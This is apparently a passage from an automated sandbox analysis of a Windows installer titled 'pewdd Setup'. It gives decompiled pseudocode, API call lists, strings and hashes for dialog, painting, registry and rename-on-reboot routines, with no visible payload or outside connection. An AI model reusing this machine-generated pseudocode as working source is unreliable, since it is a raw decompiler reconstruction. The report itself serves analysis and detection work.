									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x42cdf0 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}

0x00406825
0x0040682d
0x00406831
0x00406833
0x00406836
0x00406838
0x00406838
0x0040683a
0x00406841
0x00406843
0x00406843
0x00406849
0x0040685e
0x00406866
0x00406868
0x0040686a
0x0040686d
0x0040686e
0x0040686e
0x00406874
0x00000000
0x00000000
0x00406876
0x00406879
0x00000000
0x00000000
0x00000000
0x00406879
0x0040687d
0x00406880
0x00406882
0x00406882
0x00406885
0x0040688b
0x0040688c
0x00000000
0x00000000
0x00000000
0x0040688c
0x00406891
0x00406894
0x00406896
0x00406896
0x0040689c
0x0040689e
0x004068af
0x004068a2
0x004068a6
0x00406b4b
0x00000000
0x00406b4b
0x004068ac
0x004068ad
0x004068ad
0x004068b5
0x004068b8
0x004068bc
0x004068be
0x004068c0
0x004068c3
0x00000000
0x00000000
0x004068cb
0x004068d1
0x004068d3
0x004068d5
0x004068d6
0x004068eb
0x004068eb
0x004068ee
0x004068f0
0x004068f0
0x004068f2
0x004068f7
0x004068f9
0x00406900
0x00406902
0x0040690a
0x0040690a
0x0040690c
0x0040690d
0x0040691c
0x00406920
0x00406924
0x00406927
0x0040692a
0x0040692f
0x00406932
0x00406938
0x0040693f
0x00406945
0x00406b3e
0x00406b3e
0x00406b43
0x00406b52
0x00000000
0x00000000
0x00000000
0x00406b43
0x00406952
0x00406955
0x00406958
0x0040695b
0x0040695f
0x00000000
0x00000000
0x0040696a
0x0040696d
0x0040696e
0x00406970
0x00406976
0x00406979
0x00000000
0x00000000
0x0040697f
0x00406980
0x00406983
0x00406986
0x00406989
0x0040698f
0x00406991
0x00406991
0x00406999
0x0040699d
0x004069a2
0x004069c7
0x004069cd
0x004069cf
0x004069d1
0x004069d4
0x004069dd
0x00000000
0x00000000
0x004069a4
0x004069a4
0x004069ad
0x004069b1
0x00000000
0x00000000
0x004069c2
0x004069c2
0x004069c5
0x00000000
0x00000000
0x004069b5
0x004069b8
0x004069ba
0x004069be
0x00000000
0x00000000
0x004069c0
0x004069c0
0x00000000
0x004069c2
0x004069e6
0x004069ec
0x004069f6
0x004069f8
0x004069fd
0x004069ff
0x00406a35
0x00406a01
0x00406a01
0x00406a04
0x00406a07
0x00406a11
0x00406a14
0x00406a1b
0x00406a26
0x00406a2d
0x00406a2d
0x00406a37
0x00406a3a
0x00406a3c
0x00406a42
0x00406a42
0x00406a4b
0x00406a4e
0x00406a53
0x00406a62
0x00406a6a
0x00406a6f
0x00406a93
0x00406a9b
0x00406a9f
0x00406aa5
0x00406a71
0x00406a7f
0x00406a82
0x00406a88
0x00406a88
0x00406aa9
0x00406a64
0x00406a64
0x00406a64
0x00406aba
0x00406abe
0x00406aca
0x00406ac5
0x00406ac8
0x00406ac8
0x00406ad2
0x00406ad7
0x00406adf
0x00406adb
0x00406add
0x00406add
0x00406ae5
0x00406ae7
0x00406aee
0x00406af8
0x00406b02
0x00406b1e
0x00406b22
0x00406967
0x0040696d
0x0040696e
0x00406970
0x00406976
0x00406979
0x00000000
0x00000000
0x00000000
0x00406979
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b04
0x00406b04
0x00406b04
0x00406b09
0x00406b12
0x00406b1b
0x00000000
0x00406b1b
0x00406b28
0x00406b28
0x00406b2b
0x00406b32
0x00406b35
0x00000000
0x00406958
0x004068d8
0x004068da
0x004068da
0x004068de
0x004068e1
0x004068e2
0x004068e2
0x00000000
0x004068da
0x0040684e
0x00406854
0x00000000

Memory Dump Source

Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c33ce0fc1a3953d6a0fdc535813205e5f0e8e75a81554b33e1599d899765756
Instruction ID: 233014ff28be9fca5e40c1aeee1244862099a57bf12043c09a7623bfee50ec27
Opcode Fuzzy Hash: 9c33ce0fc1a3953d6a0fdc535813205e5f0e8e75a81554b33e1599d899765756
Instruction Fuzzy Hash: D0C13B71A00259CBCF14DF68C4905EEB7B2FF99314F26826AD856B7380D734A952CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00403E25, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 204
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00403E25(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char* _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				intOrPtr _t71;
				intOrPtr _t85;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x429fb8 =  *0x429fb8 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403D44(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x42db00;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x42eb68, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x42eb68, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x429fb8 != 0) {
						goto L25;
					} else {
						_t112 =  *0x4297a8 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403CFF(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004040B0();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x42e33c; // 0x5770b8
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_t71 =  *0x42eb98; // 0x575ac0
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 + _t71;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403DF1;
				E00403CDD(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403CDD(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403CFF( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403D12(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t85 =  *0x42eb70; // 0x571350
				_t86 =  *(_t85 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x428f9c =  *0x428f9c & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x429fb8 =  *0x429fb8 & 0x00000000;
				return 0;
			}

0x00403e35
0x00403f5b
0x00403fb7
0x00403fbb
0x00404092
0x00404094
0x00404094
0x0040409a
0x0040409a
0x0040409d
0x00000000
0x004040a4
0x00403fc9
0x00403fcb
0x00403fd5
0x00403fe0
0x00403fe3
0x00403fe6
0x00403ff1
0x00403ff4
0x00403ffb
0x00404009
0x00404021
0x00404034
0x00404044
0x00404046
0x00404046
0x00403ffb
0x00404050
0x00000000
0x0040405b
0x0040405f
0x00404070
0x00404070
0x00404076
0x00404084
0x00404084
0x00000000
0x00404088
0x00404050
0x00403f66
0x00000000
0x00403f7a
0x00403f80
0x00403f86
0x00000000
0x00000000
0x00403fab
0x00403fad
0x00403fb2
0x00000000
0x00403fb2
0x00403f66
0x00403e3b
0x00403e3e
0x00403e43
0x00403e45
0x00403e54
0x00403e54
0x00403e56
0x00403e5b
0x00403e5e
0x00403e60
0x00403e65
0x00403e6e
0x00403e74
0x00403e80
0x00403e83
0x00403e8c
0x00403e91
0x00403e94
0x00403e99
0x00403eb0
0x00403eb7
0x00403eca
0x00403ecd
0x00403ee2
0x00403ee4
0x00403ee9
0x00403eee
0x00403ef3
0x00403ef3
0x00403f02
0x00403f11
0x00403f13
0x00403f29
0x00403f38
0x00403f3a
0x00000000

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00403EB0
GetDlgItem.USER32 ref: 00403EC4
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00403EE2
GetSysColor.USER32(?), ref: 00403EF3
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00403F02
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00403F11
lstrlenA.KERNEL32(?), ref: 00403F1B
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00403F29
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00403F38
GetDlgItem.USER32 ref: 00403F9B
SendMessageA.USER32(00000000), ref: 00403F9E
GetDlgItem.USER32 ref: 00403FC9
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404009
LoadCursorA.USER32 ref: 00404018
SetCursor.USER32(00000000), ref: 00404021
ShellExecuteA.SHELL32(0000070B,open,0042DB00,00000000,00000000,00000001), ref: 00404034
LoadCursorA.USER32 ref: 00404041
SetCursor.USER32(00000000), ref: 00404044
SendMessageA.USER32(00000111,00000001,00000000), ref: 00404070
SendMessageA.USER32(00000010,00000000,00000000), ref: 00404084

Strings

N, xrefs: 00403FB7
tduolivt, xrefs: 00403FF4
open, xrefs: 0040402C

Memory Dump Source

Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: N$open$tduolivt
API String ID: 3615053054-394239126
Opcode ID: 3195d29b63b907abe7959c186dfd862ee6b367c2438cb1dc7bf172a45b8d0b96
Instruction ID: ff75cf5183ce2723ba3e9af3fd3b1123c83c1709a93184edc862a5803e63a157
Opcode Fuzzy Hash: 3195d29b63b907abe7959c186dfd862ee6b367c2438cb1dc7bf172a45b8d0b96
Instruction Fuzzy Hash: 3861CEB1A40209BFEB109F60CD45F6A7B69EB44715F10843AFB05BA2D1C7B8AD51CF98

Uniqueness

Uniqueness Score: -1.00%

Function 10001850, Relevance: 31.7, APIs: 10, Strings: 8, Instructions: 176registryCOMMON

Download Yara Rule

APIs

StringFromGUID2.OLE32(?,?,00000027), ref: 100018CF
RegOpenKeyExW.ADVAPI32(80000002,?,00000000,0002001F,?), ref: 10001919
StringFromGUID2.OLE32(?,?,00000027), ref: 10001937
RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 1000198F
RegSetValueExW.ADVAPI32(?,Description,00000000,00000001,00000000,?), ref: 100019C0
RegSetValueExW.ADVAPI32(?,IconFile,00000000,00000001,?,?), ref: 100019DD
RegSetValueExW.ADVAPI32(?,IconIndex,00000000,00000004,?,00000004), ref: 100019F6
RegSetValueExW.ADVAPI32(?,Enable,00000000,00000004,00000000,00000004), ref: 10001A15
RegCloseKey.ADVAPI32(?), ref: 10001A1F
RegCloseKey.ADVAPI32(?), ref: 10001A3E

Strings

IconIndex, xrefs: 100019ED
%s\%s, xrefs: 100018DE
%s\0x%08x\%s, xrefs: 1000194B
Enable, xrefs: 10001A0C
Description, xrefs: 100019B7
LanguageProfile, xrefs: 10001946
(%p) %s %x %s %s %s %i, xrefs: 100018B8
IconFile, xrefs: 100019D4

Memory Dump Source

Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp Download File

Similarity

API ID: Value$CloseFromString$CreateOpen
String ID: %s\%s$%s\0x%08x\%s$(%p) %s %x %s %s %s %i$Description$Enable$IconFile$IconIndex$LanguageProfile
API String ID: 4095516225-583810935
Opcode ID: 74dbcd666c5b30bc7e3fd2568325e78fb605b2b14de09ad0e83335512eb64111
Instruction ID: df736f59abcd0097081eade9b0dd8497336b80a84934a6527bad77976acb3689
Opcode Fuzzy Hash: 74dbcd666c5b30bc7e3fd2568325e78fb605b2b14de09ad0e83335512eb64111
Instruction Fuzzy Hash: 76511CB6900208BBEB14DF94DC85FEE73B9EB48745F004508FB09AA185E774EA84CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				intOrPtr _t115;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42eb70; // 0x571350
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "pewdd Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					_t115 =  *0x42eb68; // 0x203c2
					 *((intOrPtr*)(_t102 + 4)) = _t115;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x00401019
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32 ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32 ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,?), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,pewdd Setup,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

pewdd Setup, xrefs: 00401150
F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F$pewdd Setup
API String ID: 941294808-1510970880
Opcode ID: 3029600e7a8438bcc5a7b1f7b0fc9c629607e2b31f65c15310fafe19c7710355
Instruction ID: 226a36137513f208ef2a020474f107b038e547e09bed9ebbc09fe29577f91b00
Opcode Fuzzy Hash: 3029600e7a8438bcc5a7b1f7b0fc9c629607e2b31f65c15310fafe19c7710355
Instruction Fuzzy Hash: C0419B71804249AFCF058FA5CD459BFBFB9FF44314F00812AF952AA1A0C738AA51DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 10001AD0, Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 115registryCOMMON

Download Yara Rule

APIs

StringFromGUID2.OLE32(00000000,?,00000027), ref: 10001B39
RegOpenKeyExW.ADVAPI32(80000001,?,00000000,0002001F,?), ref: 10001B8D
RegQueryValueExW.ADVAPI32(?,Default,00000000,00000000,?,0000004E), ref: 10001BBD
RegCloseKey.ADVAPI32(?), ref: 10001BD0
CLSIDFromString.OLE32(?,00000000), ref: 10001BE5
RegQueryValueExW.ADVAPI32(?,Profile,00000000,00000000,?,0000004E), ref: 10001C00
CLSIDFromString.OLE32(?,00000000), ref: 10001C17
RegCloseKey.ADVAPI32(?), ref: 10001C21

Strings

N, xrefs: 10001BA1
Profile, xrefs: 10001BF7
%p) %x %s %p %p, xrefs: 10001B06
Assemblies, xrefs: 10001B48
%s\%s\0x%08x\%s, xrefs: 10001B52
Default, xrefs: 10001BB4

Memory Dump Source

Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp Download File

Similarity

API ID: FromString$CloseQueryValue$Open
String ID: %p) %x %s %p %p$%s\%s\0x%08x\%s$Assemblies$Default$N$Profile
API String ID: 1689171533-1912333115
Opcode ID: 1e6cca76155f9149102e55a1c3e60803270ed00ebddff0eedec561a0f6327374
Instruction ID: bcee0c928c0a748f03146c75f29357b32c7971ef7057f5d7be78e4c222c9fb76
Opcode Fuzzy Hash: 1e6cca76155f9149102e55a1c3e60803270ed00ebddff0eedec561a0f6327374
Instruction Fuzzy Hash: 01414EB6900218FBEB10DF94DC89FEE73F9EB48341F108519F6059A145E779EA84CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00405679, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 144
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00405679() {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				intOrPtr _t18;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405C49(1);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x42ebf0 =  *0x42ebf0 + 1;
						return _t20;
					}
				}
				 *0x42c168 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x42bbe0, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x42b7e0, "%s=%s\r\n", 0x42c168, 0x42bbe0);
						_t18 =  *0x42eb70; // 0x571350
						_t56 = _t55 + 0x10;
						E0040594D(_t43, 0x400, 0x42bbe0, 0x42bbe0,  *((intOrPtr*)(_t18 + 0x128)));
						_t20 = E00405602(0x42bbe0, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E00405577(_t51, "[Rename]\r\n") != 0) {
								_t28 = E00405577(_t26 + 0xa, 0x409328);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E004055C3(_t51 + _t29, 0x42b7e0, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E0040592B(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E00405602(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x42c168, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}

0x0040567f
0x00405686
0x0040568a
0x00405693
0x00405697
0x004057d6
0x004057d6
0x00000000
0x004057d6
0x00405697
0x004056a3
0x004056b9
0x004056e1
0x004056ec
0x004056f0
0x00405710
0x00405712
0x00405717
0x00405721
0x0040572e
0x00405733
0x00405738
0x0040573c
0x00000000
0x00000000
0x0040574b
0x0040574d
0x0040575a
0x0040575e
0x004057cf
0x004057d0
0x00000000
0x0040577a
0x00405787
0x004057ec
0x004057f3
0x0040579a
0x0040579a
0x0040579c
0x004057a5
0x004057b0
0x004057c2
0x004057c9
0x00000000
0x004057c9
0x004057f5
0x004057f6
0x004057fb
0x004057fd
0x0040580a
0x0040580a
0x0040580e
0x00000000
0x00000000
0x00000000
0x00000000
0x004057ff
0x004057ff
0x00405802
0x00405805
0x00405806
0x00000000
0x004057ff
0x00405792
0x00405797
0x00000000
0x00405797
0x0040575e
0x004056bb
0x004056c6
0x004056cf
0x004056d3
0x00000000
0x00000000
0x004056d3
0x004057e0

APIs

Part of subcall function 00405C49: GetModuleHandleA.KERNEL32(?,?,00000000,00403126,00000008), ref: 00405C5B
Part of subcall function 00405C49: LoadLibraryA.KERNELBASE(?,?,00000000,00403126,00000008), ref: 00405C66
Part of subcall function 00405C49: GetProcAddress.KERNEL32(00000000,?), ref: 00405C77

CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,0040540E,?,00000000,000000F1,?), ref: 004056C6
GetShortPathNameA.KERNEL32(?,0042C168,00000400), ref: 004056CF
